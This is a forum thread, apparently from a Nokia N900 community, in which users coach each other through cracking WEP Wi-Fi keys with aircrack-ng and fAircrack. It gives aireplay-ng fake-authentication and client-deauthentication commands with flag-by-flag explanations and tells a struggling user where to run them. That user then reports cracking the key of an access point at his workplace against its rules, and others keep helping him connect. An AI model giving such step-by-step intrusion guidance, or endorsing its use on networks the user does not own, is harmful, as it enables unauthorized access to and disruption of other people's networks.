Active Topics

 



Notices


Reply
Thread Tools
Posts: 156 | Thanked: 18 times | Joined on Feb 2010
#591
Originally Posted by teemui View Post
fake authentication:

Code:
aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 wlan0
Where:

* -1 means fake authentication
* 0 reassociation timing in seconds
* -e teddy is the wireless network name
* -a 00:14:6C:7E:40:80 is the access point MAC address
* -h 00:09:5B:EC:EE:F2 is our card MAC address
* wlan0 is the wireless interface name
when n where do i use this code??

thks
 
Posts: 102 | Thanked: 23 times | Joined on Nov 2009 @ Finland
#592
Originally Posted by dattadude View Post
when n where do i use this code??

thks
Fake authentication is used when u cant get succesful authentication/association request from AP when you press authenticate button from faircrack, succesful:
Code:
18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)
.. Is there any traffic on the AP you are trying to crack? I have my self one AP i tried to crack with no
result as there was absolutely no traffic. If there is a client connected to the AP, you can try to deauthenticate the current client. This also is a good method for getting ARP's, but only works if you have client connected!

deauthenticate:

Code:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D wlan0
Where:

* -0 means deauthentication
* 1 is the number of deauths to send (you can send multiple if you wish)
* -a 00:14:6C:7E:40:80 is the MAC address of the access point
* -c 000:0F:B5:AE:CE:9D is the MAC address of the client you are deauthing
* wlan0 is the interface name

!!!You should really read this!!!
 
Posts: 156 | Thanked: 18 times | Joined on Feb 2010
#593
Originally Posted by teemui View Post
Fake authentication is used when u cant get succesful authentication/association request from AP when you press authenticate button from faircrack, succesful:
Code:
18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)
.. Is there any traffic on the AP you are trying to crack? I have my self one AP i tried to crack with no
result as there was absolutely no traffic. If there is a client connected to the AP, you can try to deauthenticate the current client. This also is a good method for getting ARP's, but only works if you have client connected!

deauthenticate:

Code:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D wlan0
Where:

* -0 means deauthentication
* 1 is the number of deauths to send (you can send multiple if you wish)
* -a 00:14:6C:7E:40:80 is the MAC address of the access point
* -c 000:0F:B5:AE:CE:9D is the MAC address of the client you are deauthing
* wlan0 is the interface name

!!!You should really read this!!!
dude! i read tht. . i tried connectin my pc. ps3 psp to the ap n the arps shoot up bu only for lik 3 seconds. . where do i type the deaunthication code? in xterm?

ive been facepamming my head for over a week! so plz understand!

thks n cheers. .
 
Posts: 102 | Thanked: 23 times | Joined on Nov 2009 @ Finland
#594
Originally Posted by dattadude View Post
dude! i read tht. . i tried connectin my pc. ps3 psp to the ap n the arps shoot up bu only for lik 3 seconds. . where do i type the deaunthication code? in xterm?

ive been facepamming my head for over a week! so plz understand!

thks n cheers. .
Ok when u have packet capture , authenticate and injection window running, start new xterm window and type there the code:
Code:
aireplay-ng -0 1 -a ‹MAC address of AP› -c ‹MAC address of the client› wlan0
and if you get any ARP's, you can try it again changing the number "1" from the code to like "10" or "20" this is how many times deauthentication is send.
 

The Following User Says Thank You to teemui For This Useful Post:
Posts: 156 | Thanked: 18 times | Joined on Feb 2010
#595
success!!!!!!!!!!!!! i did it guys!!!! i mean after 4 days of continous face palming!!!!!!!!! i did it!!!

ok on problem though, when i use the wep key i got after decryption (finally!!!) i tried it n got the error failed to connect. . could nt retrive ip address n the wep key maybe incorrect!!!

thts when i did the mega facepalm!!!
 
Posts: 102 | Thanked: 23 times | Joined on Nov 2009 @ Finland
#596
Originally Posted by dattadude View Post
success!!!!!!!!!!!!! i did it guys!!!! i mean after 4 days of continous face palming!!!!!!!!! i did it!!!

ok on problem though, when i use the wep key i got after decryption (finally!!!) i tried it n got the error failed to connect. . could nt retrive ip address n the wep key maybe incorrect!!!

thts when i did the mega facepalm!!!
is the key you got correct? u should know if this is your own AP.
 

The Following User Says Thank You to teemui For This Useful Post:
FRuMMaGe's Avatar
Posts: 330 | Thanked: 483 times | Joined on Dec 2010 @ Norwich, UK
#597
Originally Posted by teemui View Post
is the key you got correct? u should know if this is your own AP.
It will be correct, but the router may not allow new connections from ip addresses it doesnt know.
__________________
OMNOM: Pacman-like game now in extras-devel

fAircrack (Aircrack GUI): Point-and-click pwnage for your N900
Now with John the Ripper integration
 

The Following User Says Thank You to FRuMMaGe For This Useful Post:
Posts: 156 | Thanked: 18 times | Joined on Feb 2010
#598
[QUOTE=FRuMMaGe;961946]It will be correct, but the router may not allow new connections from ip addresses it doesnt know.[/QUOT

firstly. . thks for all ur hard wrk n yes i feel god like wit my n900 thks to u!

lol. . my ap!!!

cant hak mine as i don have much traffic so very low arps. . . .

ap is at work. . u no the rules (no wifi) but i had an n900 so fuk tht shieete! ny way got the wep atleast so thks again for making it possible for noobs lik me to do cool stuff lik this. .
 
Alfred's Avatar
Posts: 855 | Thanked: 612 times | Joined on Oct 2010 @ Germany
#599
Originally Posted by Alfred View Post
Guys could You please explain me how do i delete everything that was installed in order to do all this interesting stuff, without having to reflash the device, i mean drivers, than wl1 kernel an so on?
Nobody answered, but still, can anybody help me out?
 
Posts: 102 | Thanked: 23 times | Joined on Nov 2009 @ Finland
#600
Originally Posted by Alfred View Post
Nobody answered, but still, can anybody help me out?
So you want to uninstall wl1 kernel or everything else? What exactly is the problem you have? Can you be more specific so i can try to help, im noob myself but ill help when ever i can.
 
Reply

Tags
aircrack, aircrack-ng, epicfacepalm, pen testing, rtfm dude!


 
Forum Jump


All times are GMT. The time now is 06:13.